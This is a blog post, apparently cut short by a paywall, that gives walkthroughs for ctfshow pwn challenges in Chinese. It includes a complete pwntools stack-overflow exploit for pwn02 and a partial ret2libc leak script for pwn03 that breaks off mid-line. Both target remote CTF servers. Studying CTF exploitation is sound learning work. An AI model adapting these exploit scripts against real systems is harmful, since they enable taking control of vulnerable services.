ctfshow刷题笔记(pwn篇)

最新推荐文章于 2024-05-05 11:01:15 发布
VIP文章 最新推荐文章于 2024-05-05 11:01:15 发布
阅读量3.3k 收藏 24
点赞数 4
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gygert/article/details/114903296
版权

一入pwn坑深似海,从此逆向是路人

目录

pwn02

常规checksec一下
在这里插入图片描述
扔进IDA
在这里插入图片描述
点进pwnme()函数看看,明显的栈溢出
在这里插入图片描述
搜索字符串有/bin/sh
在这里插入图片描述
直接淦它

from pwn import*
io=remote('111.231.70.44',28054)
#io=process('./pwn02')
bin_sh=0x0804850F
payload=b'a'*13+p32(bin_sh)
io.sendline(payload)
io.interactive()

轻松秒杀
在这里插入图片描述

pwn03

依旧常规checksec,只开了NX
在这里插入图片描述
和上一题几乎一样,只是没给后门,得ret2libc了
在这里插入图片描述
需要远程打通,应该是libc版本不同本地打不通

from pwn import*
from LibcSearcher import*
elf=ELF('./pwn03')
#io=process('./pwn03')
io=remote('111.231.70.44',28021)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.symbols['main']
payload1=b'a'*13+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendline(payload1)
io.recvuntil('\n\n')
puts_add=u32(io.recv(4))
print(puts_add)

libc=LibcSearcher('puts',puts_add)
libcbase=puts_add-libc
最低0.47元/天 解锁文章
Gygert
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
谷歌师兄的leetcode笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所帮助。 内容 带我去 带我去 带我去 带我去 带我去 带我去 带我去 带我去 隐私应用 ~ 开源文件加密 ~ 使用 Tor 代理 ~ 私人网页浏览器 文件浏览器 ~ 文件管理器 〜root用户的终极文件管理器 网络工具 ~ 网络工具 ~ SSH 客户端 RFID工具 ~ 超轻利用 ~ NFC 标签 ~ 〜克隆NFC标签! 无线工具 ~您身边的Wi-Fi频道 ~ 大哥在看着你 ~ ~ 检测和保护 MITM ~ 存储在您设备上的所有无线密码 ~ 安全审计工具 网页浏览器 ~ 谷歌 ~ 谷歌 ~ Flash 浏览器 ~ Mozilla ~ 其他工具 ~ ~ 自动挂载和卸载 USB 有用的工具 ~录制高质量的截屏视频 ~ VLC 媒体播放器 ~ 将您的壁纸设置为不动的图像 ~ 谷歌地图应用 ~ Android 版 Google 地
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
T1ngSh0w的博客
07-08 1053
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
ctfshow pwn 04
A2247328295的博客
04-13 410
接下来在第一个黄框位置下断点和printf函数处下断点,该断点为了查看canary的值,然后在printf()函数处下断点,该断点是为了查看canary在printf()函数处偏移,然后直接run。格式化字符串漏洞简单来说就是,由于printf函数不安全的使用造成的,%n是不安全的,还有printf(a)直接输出字符串也是不安全的,我们可以通过该漏洞获取canary泄露。黄框的地方是重点,第一个黄框为canary的插入,第二个为printf()函数的调用,第三个为canary的检验。
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1413
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 2884
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 907
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9221
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow-pwn入门-Test_your_nc
T1ngSh0w的博客
06-17 1653
ctfshow-pwn入门-test_your_nc-pwn0-pwn4
Ctfshow pwn 02(自己做出的第一道pwn
weixin_64875092的博客
12-05 5179
算是一篇第一次做出pwn的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
2024NKCTF-pwn
03-25
2024NKCTF_pwn
CTFshow-pwn入门-栈溢出pwn35-pwn36
T1ngSh0w的博客
06-21 857
CTFshow-pwn入门-栈溢出pwn35-pwn36
CTFshow-pwn入门-栈溢出pwn41-pwn42
T1ngSh0w的博客
12-27 1006
CTFshow-pwn入门-栈溢出pwn41-pwn42
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1108
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFShow pwn04
Mintind的博客
12-03 795
CTFShow pwn04 解记录
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1779
ctfshow pwn入门-前置基础pwn13-pwn19
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
最新发布
NLOS的博客
05-05 432
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师会仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他会问自己这样的问:“如果我是敌人,我会从哪里发起进攻?我的目标是什么?我会利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
ctfshowpwn2
09-28
ctfshowpwn2是一道2021年鹏城实验室的pwn,该目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值